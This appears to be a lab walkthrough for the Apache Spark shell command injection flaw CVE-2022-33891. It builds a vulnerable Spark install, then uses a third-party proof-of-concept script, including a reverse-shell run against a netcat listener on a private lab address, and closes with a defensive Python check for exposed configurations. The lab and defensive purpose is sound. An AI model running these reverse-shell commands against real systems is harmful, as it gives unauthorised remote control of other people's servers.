# CVE-2022-33891 — Apache Spark Shell Command Injection Vulnerability
# Impacted Versions
This security issue impacts Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
# Proof of Concept (PoC)
STEP 1:
Install OpenJDK version 11 with the commands:
```
sudo apt-get update
sudo apt-get install openjdk-11-jdk
java -version
```
STEP 2:
Install Scala version 3.1.3.
Download the TAR file from GitHub: https://github.com/lampepfl/dotty/releases/tag/3.1.3
Extract the TAR file with the commands:
```
cd Downloads
tar xvf {scala filename}
sudo su
# move the extracted directory, not the archive
mv {scala filename} /usr/local/scala
exit
export PATH=$PATH:/usr/local/scala/bin
scala -version
```
STEP 3:
Install Apache Spark.
Link: https://archive.apache.org/dist/spark/spark-3.1.1/
File: spark-3.1.1-bin-hadoop2.7.tgz
Commands:
```
tar xvf spark-3.1.1-bin-hadoop2.7.tgz
sudo su
# move the extracted directory, not the .tgz archive
mv spark-3.1.1-bin-hadoop2.7 /usr/local/spark
exit
sudo nano ~/.zshrc    # add the line: export PATH=$PATH:/usr/local/spark/bin
source ~/.zshrc
spark-shell
```
Exit the shell using Ctrl + C.
STEP 4:
Enable ACLs with the commands:
```
cd /usr/local/spark/conf
cp spark-defaults.conf.template spark-defaults.conf
echo "spark.acls.enable true" >> spark-defaults.conf
cat spark-defaults.conf
cd /usr/local/spark
cd sbin
./start-master.sh
spark-shell
```
STEP 5:
Download the exploit zip file: https://github.com/HuskyHacks/cve-2022-33891
Unzip the file, then run the commands:
```
cd Downloads/cve-2022-33891-main
python3 poc.py -u http://192.168.154.128 -p 8080 --check --verbose
```
STEP 6:
Install netcat-traditional using the command:
```
sudo apt install netcat-traditional
```
STEP 7:
Run the exploit using these commands in different terminals.
In the first shell:
```
nc -lvp 9001
```
In the second shell:
```
python3 poc.py -u http://192.168.154.128 -p 8080 --revshell -lh 192.168.154.128 -lp 9001 --verbose
```
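
The lab is only exposed because STEP 3 installs a version inside the impacted ranges and STEP 4 sets `spark.acls.enable`. As an added example (not part of the original README or the PoC repository), this Python check flags that combination from a version string and the text of `spark-defaults.conf`; the function names, status labels and sample config are constructed for illustration, and the parsing assumes the usual properties-file separators (whitespace, `=` or `:`).

```python
import re

# Impacted ranges exactly as listed on this page (inclusive bounds).
AFFECTED = [((0, 0, 0), (3, 0, 3)), ((3, 1, 1), (3, 1, 2)), ((3, 2, 0), (3, 2, 1))]

def parse_version(text):
    """Extract (major, minor, patch) from e.g. '3.1.1' or 'version 3.1.1'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(p) for p in m.groups())

def version_affected(version):
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED)

def acls_enabled(conf_text):
    """Effective spark.acls.enable value in spark-defaults.conf text.
    Assumption: later entries override earlier ones, as in a properties file."""
    enabled = False  # Spark's default when the key is absent
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue  # blank line or comment
        parts = re.split(r"\s*[=:]\s*|\s+", line, maxsplit=1)
        value = parts[1].strip() if len(parts) > 1 else ""
        if parts[0] == "spark.acls.enable":
            enabled = value.lower() == "true"
    return enabled

def assess(version, conf_text):
    """Flag the combination this page's lab builds: impacted version + ACLs on."""
    affected, acls = version_affected(version), acls_enabled(conf_text)
    if affected and acls:
        status = "exposed"
    elif affected:
        status = "affected-version-acls-off"
    else:
        status = "not-in-listed-ranges"
    return {"version": parse_version(version), "acls_enabled": acls, "status": status}

# Constructed sample: template-style comments plus the line appended in STEP 4.
SAMPLE_CONF = "# spark.master  spark://master:7077\nspark.acls.enable true\n"

if __name__ == "__main__":
    print(assess("3.1.1", SAMPLE_CONF))
```

The version string can be taken from `spark-submit --version` on the host being audited.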